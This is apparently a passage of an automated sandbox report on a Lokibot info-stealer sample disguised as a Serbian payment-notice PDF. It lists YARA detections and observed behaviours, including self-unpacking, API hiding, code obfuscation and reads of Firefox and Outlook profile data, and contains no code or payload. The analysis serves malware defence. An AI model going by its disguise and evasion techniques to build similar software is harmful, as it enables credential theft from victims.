Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.winEXE@3/2@0/1
Contains functionality for error loggingShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00425D58 GetLastError,FormatMessageA,0_2_00425D58
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_1_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_1_0040650A
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0040896E GetDiskFreeSpaceA,0_2_0040896E
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00418428 FindResourceA,0_2_00418428
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-58933367-3072710494-194312298-1002\4216a73197943a17d1161a6bdc4512b0_59407d34-c8c5-44df-a766-ba8a11cb1cb0Jump to behavior
Creates mutexesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeMutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Reads ini filesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeVirustotal: Detection: 39%
Sample might require command line argumentsShow sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeString found in binary or memory: Uh/aDd
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe 'C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe'
Source: unknownProcess created: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe 'C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe'
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess created: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe 'C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe' Jump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeUnpacked PE file: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeUnpacked PE file: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E988 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042E988
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0045DC48 push 0045DCD5h; ret 0_2_0045DCCD
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00406040 push 0040606Ch; ret 0_2_00406064
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004460F4 push 00446136h; ret 0_2_0044612E
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004060FC push 00406128h; ret 0_2_00406120
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E240 push 0042E27Eh; ret 0_2_0042E276
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042C244 push 0042C270h; ret 0_2_0042C268
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E2C0 push 0042E2F8h; ret 0_2_0042E2F0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004382E8 push 0043830Eh; ret 0_2_00438306
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E288 push 0042E2B4h; ret 0_2_0042E2AC
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0043834C push 00438378h; ret 0_2_00438370
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0040E38C push 0040E3B8h; ret 0_2_0040E3B0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004744B4 push 00474531h; ret 0_2_00474529
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00436574 push 004365A0h; ret 0_2_00436598
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004365C4 push 00436607h; ret 0_2_004365FF
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E5E4 push 0042E610h; ret 0_2_0042E608
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0043662C push 0043666Fh; ret 0_2_00436667
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004366E8 push 00436733h; ret 0_2_0043672B
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00436690 push 004366DCh; ret 0_2_004366D4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E790 push 0042E7BCh; ret 0_2_0042E7B4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0041A814 push ecx; mov dword ptr [esp], ecx0_2_0041A819
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00422892 push 0042293Fh; ret 0_2_00422937
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00422894 push 0042293Fh; ret 0_2_00422937
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00422944 push 004229D4h; ret 0_2_004229CC
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00414964 push 004149DAh; ret 0_2_004149D2
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004149DC push 00414A84h; ret 0_2_00414A7C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0044C9EC push 0044CA61h; ret 0_2_0044CA59
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0045E9B4 push ecx; mov dword ptr [esp], edx0_2_0045E9B8
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0044CA64 push 0044CABDh; ret 0_2_0044CAB5
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042CA98 push 0042CAC4h; ret 0_2_0042CABC
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00430A9C push 00430AF5h; ret 0_2_00430AED
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00460B64 push 00460B90h; ret 0_2_00460B88

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00471404 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_00471404
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0046E42C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,0_2_0046E42C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0045862C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_0045862C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042CCD0 IsIconic,GetWindowPlacement,GetWindowRect,0_2_0042CCD0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00458F50 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_00458F50
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00471B24 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00471B24
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00471BD4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00471BD4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00457D78 IsIconic,GetCapture,0_2_00457D78
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E988 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042E988
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
